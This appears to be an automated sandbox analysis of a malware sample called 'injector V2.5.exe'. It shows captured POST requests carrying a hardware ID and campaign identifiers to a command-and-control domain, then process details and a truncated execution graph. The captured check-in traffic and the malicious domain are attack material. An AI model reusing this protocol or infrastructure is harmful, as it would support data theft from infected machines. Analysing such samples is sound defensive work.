                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lspfioqh%2F1azg4v5sC3bo4M%2FCkwu8unkAZ6CbBle%2FWCyDgSgQdFa8aMWNJ%2BjKlG%2BV9dQN5ddJbytyIC3k%2B6qX87%2FH7WTIsftlOSRgfLxpsy5h2XYwoy%2F5Wc5ywhF9cNOq9Fz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e7170fb3b6443ec-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2176&delivery_rate=1651583&cwnd=226&unsent_bytes=0&cid=a95d7b0738088fbc&ts=698&x=0"
                                                                        2024-11-23 13:17:46 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 13:17:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.449738104.21.88.2504436276C:\Users\user\Desktop\injector V2.5.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 13:17:48 UTC271OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=7TCT4MM8
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 1074
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 13:17:48 UTC1074OUTData Raw: 2d 2d 37 54 43 54 34 4d 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 35 32 31 44 31 44 44 34 32 46 46 34 44 34 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 37 54 43 54 34 4d 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 54 43 54 34 4d 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30 35 0d 0a 2d 2d 37 54 43 54 34 4d 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                        Data Ascii: --7TCT4MM8Content-Disposition: form-data; name="hwid"E8521D1DD42FF4D4FF1C6333321FCDD9--7TCT4MM8Content-Disposition: form-data; name="pid"1--7TCT4MM8Content-Disposition: form-data; name="lid"HpOoIh--b701621bcd05--7TCT4MM8Content-D
                                                                        2024-11-23 13:17:49 UTC1013INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 13:17:49 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=acuhafqn2icqpu7g5jjet6bhgb; expires=Wed, 19-Mar-2025 07:04:27 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dHdTk8wrMr9QeKMNYvteJ%2BSJZ1tphz3pzj%2FX6iDeCnJWxD%2BQPyCtMj6ZnQNANWrxfbxJtFLJ%2F8mP1rta0yrPCbWIO3OJ3e10W13WqqT%2Fno87hp2iZCJT7mGAabGfNyQ4JKn4"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e71710879d4efa5-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1890&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1981&delivery_rate=1522419&cwnd=187&unsent_bytes=0&cid=b47a8fa16bbda206&ts=1409&x=0"
                                                                        2024-11-23 13:17:49 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                        Data Ascii: eok 8.46.123.75
                                                                        2024-11-23 13:17:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.449742104.21.88.2504436276C:\Users\user\Desktop\injector V2.5.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 13:17:50 UTC265OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 121
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 13:17:50 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 37 30 31 36 32 31 62 63 64 30 35 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 45 38 35 32 31 44 31 44 44 34 32 46 46 34 44 34 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39
                                                                        Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--b701621bcd05&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=E8521D1DD42FF4D4FF1C6333321FCDD9
                                                                        2024-11-23 13:17:51 UTC1008INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 13:17:51 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=i4ktt74o30d57qa4mpg33us7kk; expires=Wed, 19-Mar-2025 07:04:30 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kKc6vpgGV7q5gbgHpv4Aa3kkw0ySoRTDTe%2FEHORdBVGG3nhxYalssQq3n9luE4TgzaGHDIxRSvS6oFUKkN8y6J8n7cOAygILrc59x6tR1S4y36JflM5f%2FLD5293Fp%2BpJZGoB"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e71711a3dd50f42-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1022&delivery_rate=1752701&cwnd=180&unsent_bytes=0&cid=d21e6d72cfc0506c&ts=709&x=0"
                                                                        2024-11-23 13:17:51 UTC54INData Raw: 33 30 0d 0a 76 49 30 59 77 30 63 4f 4c 30 5a 31 45 6f 39 44 75 43 4f 67 68 2b 37 31 33 67 57 77 46 55 6d 56 65 53 75 38 65 33 66 5a 4a 4f 7a 6e 30 41 3d 3d 0d 0a
                                                                        Data Ascii: 30vI0Yw0cOL0Z1Eo9DuCOgh+713gWwFUmVeSu8e3fZJOzn0A==
                                                                        2024-11-23 13:17:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:08:17:27
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\Desktop\injector V2.5.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\injector V2.5.exe"
                                                                        Imagebase:0x5f0000
                                                                        File size:501'248 bytes
                                                                        MD5 hash:BCC3A5AC8CA364B58E08A8E771992D6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:08:17:27
                                                                        Start date:23/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:08:17:28
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\Desktop\injector V2.5.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\injector V2.5.exe"
                                                                        Imagebase:0x5f0000
                                                                        File size:501'248 bytes
                                                                        MD5 hash:BCC3A5AC8CA364B58E08A8E771992D6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:4.1%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:3.5%
                                                                          Total number of Nodes:1634
                                                                          Total number of Limit Nodes:25
                                                                          execution_graph 8523 6056e2 8524 6056ee __FrameHandler3::FrameUnwindToState 8523->8524 8549 60508f 8524->8549 8526 6056f5 8527 60584e 8526->8527 8537 60571f ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 8526->8537 8590 605444 IsProcessorFeaturePresent 8527->8590 8529 605855 8530 60585b 8529->8530 8594 606ed5 8529->8594 8597 606eeb 8530->8597 8534 60573e 8535 6057bf 8560 607a56 8535->8560 8537->8534 8537->8535 8573 606f1f 8537->8573 8539 6057c5 8564 5fcd90 8539->8564 8544 6057ea 8545 6057f3 8544->8545 8581 606f01 8544->8581 8584 6050c8 8545->8584 8550 605098 8549->8550 8600 605200 IsProcessorFeaturePresent 8550->8600 8554 6050a9 8559 6050ad 8554->8559 8610 606a60 8554->8610 8557 6050c4 8557->8526 8559->8526 8561 607a64 8560->8561 8562 607a5f 8560->8562 8561->8539 8682 607b7f 8562->8682 9551 5fce30 8564->9551 8571 604241 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 8572 5fce24 8571->8572 8579 6053ec GetModuleHandleW 8572->8579 8574 606f35 __FrameHandler3::FrameUnwindToState __dosmaperr 8573->8574 8574->8535 8575 60a00a _unexpected 48 API calls 8574->8575 8578 60847c 8575->8578 8576 60835d __FrameHandler3::FrameUnwindToState 48 API calls 8577 6084a6 8576->8577 8578->8576 8580 6053f8 8579->8580 8580->8529 8580->8544 9938 607020 8581->9938 8585 6050d4 8584->8585 8586 6050ea 8585->8586 10011 606a72 8585->10011 8586->8534 8588 6050e2 8589 6060ca ___scrt_uninitialize_crt 7 API calls 8588->8589 8589->8586 8591 60545a __CreateFrameInfo std::bad_exception::bad_exception 8590->8591 8592 605505 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8591->8592 8593 605550 __CreateFrameInfo 8592->8593 8593->8529 8595 607020 __CreateFrameInfo 21 API calls 8594->8595 8596 606ee6 8595->8596 8596->8530 8598 607020 __CreateFrameInfo 21 API calls 8597->8598 8599 605863 8598->8599 8601 6050a4 8600->8601 8602 6060ab 8601->8602 8619 609706 8602->8619 8605 6060b4 8605->8554 8607 6060bc 8608 6060c7 8607->8608 8633 609742 8607->8633 8608->8554 8673 60b105 8610->8673 8613 6060ca 8614 6060d3 8613->8614 8615 6060dd 8613->8615 8616 608811 ___vcrt_uninitialize_ptd 6 API calls 8614->8616 8615->8559 8617 6060d8 8616->8617 8618 609742 ___vcrt_uninitialize_locks DeleteCriticalSection 8617->8618 8618->8615 8620 60970f 8619->8620 8622 609738 8620->8622 8623 6060b0 8620->8623 8637 60dc17 8620->8637 8624 609742 ___vcrt_uninitialize_locks DeleteCriticalSection 8622->8624 8623->8605 8625 6087de 8623->8625 8624->8623 8654 60db28 8625->8654 8630 60880e 8630->8607 8632 6087f3 8632->8607 8634 60976c 8633->8634 8635 60974d 8633->8635 8634->8605 8636 609757 DeleteCriticalSection 8635->8636 8636->8634 8636->8636 8642 60dca9 8637->8642 8640 60dc4f InitializeCriticalSectionAndSpinCount 8641 60dc3a 8640->8641 8641->8620 8643 60dc31 8642->8643 8646 60dcca 8642->8646 8643->8640 8643->8641 8644 60dd32 GetProcAddress 8644->8643 8646->8643 8646->8644 8647 60dd23 8646->8647 8649 60dc5e LoadLibraryExW 8646->8649 8647->8644 8648 60dd2b FreeLibrary 8647->8648 8648->8644 8650 60dc75 GetLastError 8649->8650 8651 60dca5 8649->8651 8650->8651 8652 60dc80 ___vcrt_InitializeCriticalSectionEx 8650->8652 8651->8646 8652->8651 8653 60dc96 LoadLibraryExW 8652->8653 8653->8646 8655 60dca9 ___vcrt_InitializeCriticalSectionEx 5 API calls 8654->8655 8656 60db42 8655->8656 8657 60db5b TlsAlloc 8656->8657 8658 6087e8 8656->8658 8658->8632 8659 60dbd9 8658->8659 8660 60dca9 ___vcrt_InitializeCriticalSectionEx 5 API calls 8659->8660 8661 60dbf3 8660->8661 8662 60dc0e TlsSetValue 8661->8662 8663 608801 8661->8663 8662->8663 8663->8630 8664 608811 8663->8664 8665 608821 8664->8665 8666 60881b 8664->8666 8665->8632 8668 60db63 8666->8668 8669 60dca9 ___vcrt_InitializeCriticalSectionEx 5 API calls 8668->8669 8670 60db7d 8669->8670 8671 60db95 TlsFree 8670->8671 8672 60db89 8670->8672 8671->8672 8672->8665 8674 60b115 8673->8674 8675 6050b6 8673->8675 8674->8675 8677 60a732 8674->8677 8675->8557 8675->8613 8679 60a739 8677->8679 8678 60a77c GetStdHandle 8678->8679 8679->8678 8680 60a7de 8679->8680 8681 60a78f GetFileType 8679->8681 8680->8674 8681->8679 8683 607b88 8682->8683 8686 607b9e 8682->8686 8683->8686 8688 607ac0 8683->8688 8685 607b95 8685->8686 8705 607c8d 8685->8705 8686->8561 8689 607ac9 8688->8689 8690 607acc 8688->8690 8689->8685 8714 60a880 8690->8714 8695 607ae9 8747 607bab 8695->8747 8696 607add 8741 60b0cb 8696->8741 8701 60b0cb __freea 14 API calls 8702 607b0d 8701->8702 8703 60b0cb __freea 14 API calls 8702->8703 8704 607b13 8703->8704 8704->8685 8706 607cfe 8705->8706 8711 607c9c 8705->8711 8706->8686 8707 60d131 WideCharToMultiByte ___scrt_uninitialize_crt 8707->8711 8708 60b807 __dosmaperr 14 API calls 8708->8711 8709 607d02 8710 60b0cb __freea 14 API calls 8709->8710 8710->8706 8711->8706 8711->8707 8711->8708 8711->8709 8713 60b0cb __freea 14 API calls 8711->8713 9336 60d304 8711->9336 8713->8711 8715 607ad2 8714->8715 8716 60a889 8714->8716 8720 60d22d GetEnvironmentStringsW 8715->8720 8769 60a0c5 8716->8769 8721 60d245 8720->8721 8727 607ad7 8720->8727 8722 60d131 ___scrt_uninitialize_crt WideCharToMultiByte 8721->8722 8723 60d262 8722->8723 8724 60d277 8723->8724 8725 60d26c FreeEnvironmentStringsW 8723->8725 8726 60bc45 15 API calls 8724->8726 8725->8727 8728 60d27e 8726->8728 8727->8695 8727->8696 8729 60d286 8728->8729 8730 60d297 8728->8730 8731 60b0cb __freea 14 API calls 8729->8731 8732 60d131 ___scrt_uninitialize_crt WideCharToMultiByte 8730->8732 8733 60d28b FreeEnvironmentStringsW 8731->8733 8734 60d2a7 8732->8734 8733->8727 8735 60d2b6 8734->8735 8736 60d2ae 8734->8736 8738 60b0cb __freea 14 API calls 8735->8738 8737 60b0cb __freea 14 API calls 8736->8737 8739 60d2b4 FreeEnvironmentStringsW 8737->8739 8738->8739 8739->8727 8742 607ae3 8741->8742 8743 60b0d6 RtlFreeHeap 8741->8743 8742->8685 8743->8742 8744 60b0eb GetLastError 8743->8744 8745 60b0f8 __dosmaperr 8744->8745 8746 60b757 __strnicoll 12 API calls 8745->8746 8746->8742 8748 607bc0 8747->8748 8749 60b807 __dosmaperr 14 API calls 8748->8749 8750 607be7 8749->8750 8751 607bef 8750->8751 8757 607bf9 8750->8757 8752 60b0cb __freea 14 API calls 8751->8752 8753 607af0 8752->8753 8753->8701 8754 607c56 8755 60b0cb __freea 14 API calls 8754->8755 8755->8753 8756 60b807 __dosmaperr 14 API calls 8756->8757 8757->8754 8757->8756 8758 607c65 8757->8758 8762 607c80 8757->8762 8764 60b0cb __freea 14 API calls 8757->8764 9317 6096ac 8757->9317 9326 607b50 8758->9326 9332 607d96 IsProcessorFeaturePresent 8762->9332 8763 60b0cb __freea 14 API calls 8766 607c72 8763->8766 8764->8757 8767 60b0cb __freea 14 API calls 8766->8767 8767->8753 8768 607c8c 8770 60a0d0 8769->8770 8771 60a0d6 8769->8771 8816 609b90 8770->8816 8790 60a0dc 8771->8790 8821 609bcf 8771->8821 8779 60a108 8781 609bcf __dosmaperr 6 API calls 8779->8781 8780 60a11d 8782 609bcf __dosmaperr 6 API calls 8780->8782 8791 60a114 8781->8791 8783 60a129 8782->8783 8784 60a13c 8783->8784 8785 60a12d 8783->8785 8835 60a31c 8784->8835 8788 609bcf __dosmaperr 6 API calls 8785->8788 8787 60b0cb __freea 14 API calls 8787->8790 8788->8791 8793 60a0e1 8790->8793 8840 60835d 8790->8840 8791->8787 8792 60b0cb __freea 14 API calls 8792->8793 8794 60acc3 8793->8794 8795 60aced 8794->8795 9141 60ab4f 8795->9141 8800 60ad2d 9155 60a94a 8800->9155 8801 60ad1f 8802 60b0cb __freea 14 API calls 8801->8802 8804 60ad06 8802->8804 8804->8715 8806 60ad65 8807 60b757 __strnicoll 14 API calls 8806->8807 8809 60ad6a 8807->8809 8808 60adac 8811 60adf5 8808->8811 9166 60b07e 8808->9166 8812 60b0cb __freea 14 API calls 8809->8812 8810 60ad80 8810->8808 8813 60b0cb __freea 14 API calls 8810->8813 8815 60b0cb __freea 14 API calls 8811->8815 8812->8804 8813->8808 8815->8804 8849 609e9e 8816->8849 8819 609bb5 8819->8771 8820 609bc7 TlsGetValue 8822 609e9e __dosmaperr 5 API calls 8821->8822 8823 609beb 8822->8823 8824 609bf4 8823->8824 8825 609c09 TlsSetValue 8823->8825 8824->8790 8826 60b807 8824->8826 8827 60b814 8826->8827 8828 60b854 8827->8828 8829 60b828 __dosmaperr 8827->8829 8830 60b83f HeapAlloc 8827->8830 8867 60b757 8828->8867 8829->8828 8829->8830 8864 607207 8829->8864 8830->8829 8831 60b852 8830->8831 8833 60a100 8831->8833 8833->8779 8833->8780 8904 60a482 8835->8904 9006 60b1bc 8840->9006 8843 608377 IsProcessorFeaturePresent 8846 608362 8843->8846 8844 606eeb __CreateFrameInfo 21 API calls 8844->8846 8846->8840 8846->8843 8846->8844 8848 608839 8846->8848 9009 60b1e3 8846->9009 9036 607dca 8846->9036 9042 60883a 8846->9042 8850 609ece 8849->8850 8853 609bac 8849->8853 8850->8853 8856 609dd3 8850->8856 8853->8819 8853->8820 8854 609ee8 GetProcAddress 8854->8853 8855 609ef8 __dosmaperr 8854->8855 8855->8853 8862 609de4 ___vcrt_InitializeCriticalSectionEx 8856->8862 8857 609e7a 8857->8853 8857->8854 8858 609e02 LoadLibraryExW 8859 609e81 8858->8859 8860 609e1d GetLastError 8858->8860 8859->8857 8861 609e93 FreeLibrary 8859->8861 8860->8862 8861->8857 8862->8857 8862->8858 8863 609e50 LoadLibraryExW 8862->8863 8863->8859 8863->8862 8870 607242 8864->8870 8881 60a15b GetLastError 8867->8881 8869 60b75c 8869->8833 8871 60724e __FrameHandler3::FrameUnwindToState 8870->8871 8876 608161 EnterCriticalSection 8871->8876 8873 607259 __CreateFrameInfo 8877 607290 8873->8877 8876->8873 8880 608178 LeaveCriticalSection 8877->8880 8879 607212 8879->8829 8880->8879 8882 60a171 8881->8882 8883 60a177 8881->8883 8885 609b90 __dosmaperr 6 API calls 8882->8885 8884 609bcf __dosmaperr 6 API calls 8883->8884 8887 60a17b SetLastError 8883->8887 8886 60a193 8884->8886 8885->8883 8886->8887 8889 60b807 __dosmaperr 12 API calls 8886->8889 8887->8869 8890 60a1a8 8889->8890 8891 60a1b0 8890->8891 8892 60a1c1 8890->8892 8893 609bcf __dosmaperr 6 API calls 8891->8893 8894 609bcf __dosmaperr 6 API calls 8892->8894 8901 60a1be 8893->8901 8895 60a1cd 8894->8895 8896 60a1d1 8895->8896 8897 60a1e8 8895->8897 8900 609bcf __dosmaperr 6 API calls 8896->8900 8899 60a31c __dosmaperr 12 API calls 8897->8899 8898 60b0cb __freea 12 API calls 8898->8887 8902 60a1f3 8899->8902 8900->8901 8901->8898 8903 60b0cb __freea 12 API calls 8902->8903 8903->8887 8905 60a48e __FrameHandler3::FrameUnwindToState 8904->8905 8918 608161 EnterCriticalSection 8905->8918 8907 60a498 8919 60a4c8 8907->8919 8910 60a4d4 8911 60a4e0 __FrameHandler3::FrameUnwindToState 8910->8911 8923 608161 EnterCriticalSection 8911->8923 8913 60a4ea 8924 60a2d1 8913->8924 8915 60a502 8928 60a522 8915->8928 8918->8907 8922 608178 LeaveCriticalSection 8919->8922 8921 60a38a 8921->8910 8922->8921 8923->8913 8925 60a307 __dosmaperr 8924->8925 8926 60a2e0 __dosmaperr 8924->8926 8925->8915 8926->8925 8931 60bfae 8926->8931 9005 608178 LeaveCriticalSection 8928->9005 8930 60a147 8930->8792 8933 60c02e 8931->8933 8934 60bfc4 8931->8934 8935 60b0cb __freea 14 API calls 8933->8935 8958 60c07c 8933->8958 8934->8933 8938 60bff7 8934->8938 8941 60b0cb __freea 14 API calls 8934->8941 8936 60c050 8935->8936 8937 60b0cb __freea 14 API calls 8936->8937 8939 60c063 8937->8939 8943 60b0cb __freea 14 API calls 8938->8943 8957 60c019 8938->8957 8944 60b0cb __freea 14 API calls 8939->8944 8940 60b0cb __freea 14 API calls 8945 60c023 8940->8945 8947 60bfec 8941->8947 8942 60c08a 8946 60c0ea 8942->8946 8953 60b0cb 14 API calls __freea 8942->8953 8948 60c00e 8943->8948 8949 60c071 8944->8949 8950 60b0cb __freea 14 API calls 8945->8950 8951 60b0cb __freea 14 API calls 8946->8951 8959 60b9d5 8947->8959 8987 60bad3 8948->8987 8955 60b0cb __freea 14 API calls 8949->8955 8950->8933 8956 60c0f0 8951->8956 8953->8942 8955->8958 8956->8925 8957->8940 8999 60c148 8958->8999 8960 60b9e6 8959->8960 8986 60bacf 8959->8986 8961 60b9f7 8960->8961 8962 60b0cb __freea 14 API calls 8960->8962 8963 60ba09 8961->8963 8964 60b0cb __freea 14 API calls 8961->8964 8962->8961 8965 60ba1b 8963->8965 8966 60b0cb __freea 14 API calls 8963->8966 8964->8963 8967 60ba2d 8965->8967 8968 60b0cb __freea 14 API calls 8965->8968 8966->8965 8969 60ba3f 8967->8969 8970 60b0cb __freea 14 API calls 8967->8970 8968->8967 8971 60ba51 8969->8971 8972 60b0cb __freea 14 API calls 8969->8972 8970->8969 8973 60ba63 8971->8973 8974 60b0cb __freea 14 API calls 8971->8974 8972->8971 8975 60ba75 8973->8975 8976 60b0cb __freea 14 API calls 8973->8976 8974->8973 8977 60b0cb __freea 14 API calls 8975->8977 8979 60ba87 8975->8979 8976->8975 8977->8979 8978 60b0cb __freea 14 API calls 8980 60ba99 8978->8980 8979->8978 8979->8980 8981 60b0cb __freea 14 API calls 8980->8981 8982 60baab 8980->8982 8981->8982 8983 60babd 8982->8983 8984 60b0cb __freea 14 API calls 8982->8984 8985 60b0cb __freea 14 API calls 8983->8985 8983->8986 8984->8983 8985->8986 8986->8938 8988 60bae0 8987->8988 8989 60bb38 8987->8989 8990 60baf0 8988->8990 8991 60b0cb __freea 14 API calls 8988->8991 8989->8957 8992 60bb02 8990->8992 8993 60b0cb __freea 14 API calls 8990->8993 8991->8990 8994 60bb14 8992->8994 8996 60b0cb __freea 14 API calls 8992->8996 8993->8992 8995 60bb26 8994->8995 8997 60b0cb __freea 14 API calls 8994->8997 8995->8989 8998 60b0cb __freea 14 API calls 8995->8998 8996->8994 8997->8995 8998->8989 9000 60c155 8999->9000 9004 60c174 8999->9004 9001 60bb3c __dosmaperr 14 API calls 9000->9001 9000->9004 9002 60c16e 9001->9002 9003 60b0cb __freea 14 API calls 9002->9003 9003->9004 9004->8942 9005->8930 9056 60b43f 9006->9056 9015 60b1ef __FrameHandler3::FrameUnwindToState 9009->9015 9010 60a15b __dosmaperr 14 API calls 9019 60b220 __CreateFrameInfo 9010->9019 9011 60b23f 9014 60b757 __strnicoll 14 API calls 9011->9014 9012 60b229 9012->8846 9013 60b251 __CreateFrameInfo 9016 60b287 __CreateFrameInfo 9013->9016 9070 608161 EnterCriticalSection 9013->9070 9017 60b244 9014->9017 9015->9010 9015->9011 9015->9013 9015->9019 9022 60b3c1 9016->9022 9023 60b2c4 9016->9023 9033 60b2f2 9016->9033 9067 607d69 9017->9067 9019->9011 9019->9012 9019->9013 9024 60b3cc 9022->9024 9102 608178 LeaveCriticalSection 9022->9102 9023->9033 9071 60a00a GetLastError 9023->9071 9027 606eeb __CreateFrameInfo 21 API calls 9024->9027 9028 60b3d4 9027->9028 9031 60a00a _unexpected 48 API calls 9034 60b347 9031->9034 9032 60a00a _unexpected 48 API calls 9032->9033 9098 60b36d 9033->9098 9034->9012 9035 60a00a _unexpected 48 API calls 9034->9035 9035->9012 9037 607de6 __CreateFrameInfo std::bad_exception::bad_exception 9036->9037 9038 607e12 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9037->9038 9041 607ee3 __CreateFrameInfo 9038->9041 9040 607f01 9040->8846 9125 604241 9041->9125 9043 608843 9042->9043 9044 608846 GetLastError 9042->9044 9043->8846 9133 60db9e 9044->9133 9047 6088c0 SetLastError 9047->8846 9048 60dbd9 ___vcrt_FlsSetValue 6 API calls 9049 608874 __CreateFrameInfo 9048->9049 9050 60dbd9 ___vcrt_FlsSetValue 6 API calls 9049->9050 9052 60889c 9049->9052 9055 60887a 9049->9055 9050->9052 9051 60dbd9 ___vcrt_FlsSetValue 6 API calls 9053 6088b0 9051->9053 9052->9051 9052->9053 9138 6083ac 9053->9138 9055->9047 9057 60b44b __FrameHandler3::FrameUnwindToState 9056->9057 9062 608161 EnterCriticalSection 9057->9062 9059 60b459 9063 60b49b 9059->9063 9062->9059 9066 608178 LeaveCriticalSection 9063->9066 9065 60b1e1 9065->8846 9066->9065 9103 60809f 9067->9103 9070->9016 9072 60a020 9071->9072 9073 60a026 9071->9073 9074 609b90 __dosmaperr 6 API calls 9072->9074 9075 609bcf __dosmaperr 6 API calls 9073->9075 9095 60a02a SetLastError 9073->9095 9074->9073 9076 60a042 9075->9076 9078 60b807 __dosmaperr 14 API calls 9076->9078 9076->9095 9079 60a057 9078->9079 9083 60a070 9079->9083 9084 60a05f 9079->9084 9080 60a0ba 9080->9032 9081 60a0bf 9082 60835d __FrameHandler3::FrameUnwindToState 46 API calls 9081->9082 9085 60a0c4 9082->9085 9087 609bcf __dosmaperr 6 API calls 9083->9087 9086 609bcf __dosmaperr 6 API calls 9084->9086 9089 60a06d 9086->9089 9088 60a07c 9087->9088 9090 60a080 9088->9090 9091 60a097 9088->9091 9093 60b0cb __freea 14 API calls 9089->9093 9092 609bcf __dosmaperr 6 API calls 9090->9092 9094 60a31c __dosmaperr 14 API calls 9091->9094 9092->9089 9093->9095 9096 60a0a2 9094->9096 9095->9080 9095->9081 9097 60b0cb __freea 14 API calls 9096->9097 9097->9095 9099 60b371 9098->9099 9100 60b339 9098->9100 9124 608178 LeaveCriticalSection 9099->9124 9100->9012 9100->9031 9100->9034 9102->9024 9104 6080b1 __strnicoll 9103->9104 9109 607f12 9104->9109 9110 607f22 9109->9110 9114 607f29 9109->9114 9111 608030 __strnicoll 16 API calls 9110->9111 9111->9114 9112 607f37 9118 607fd7 9112->9118 9113 608076 __strnicoll GetLastError SetLastError 9115 607f5e 9113->9115 9114->9112 9114->9113 9115->9112 9116 607d96 __strnicoll 11 API calls 9115->9116 9117 607f8e 9116->9117 9119 607fe3 9118->9119 9120 608013 __strnicoll 48 API calls 9119->9120 9122 607ffa 9119->9122 9120->9122 9121 607d75 9121->9012 9122->9121 9123 608013 __strnicoll 48 API calls 9122->9123 9123->9121 9124->9100 9126 604249 9125->9126 9127 60424a IsProcessorFeaturePresent 9125->9127 9126->9040 9129 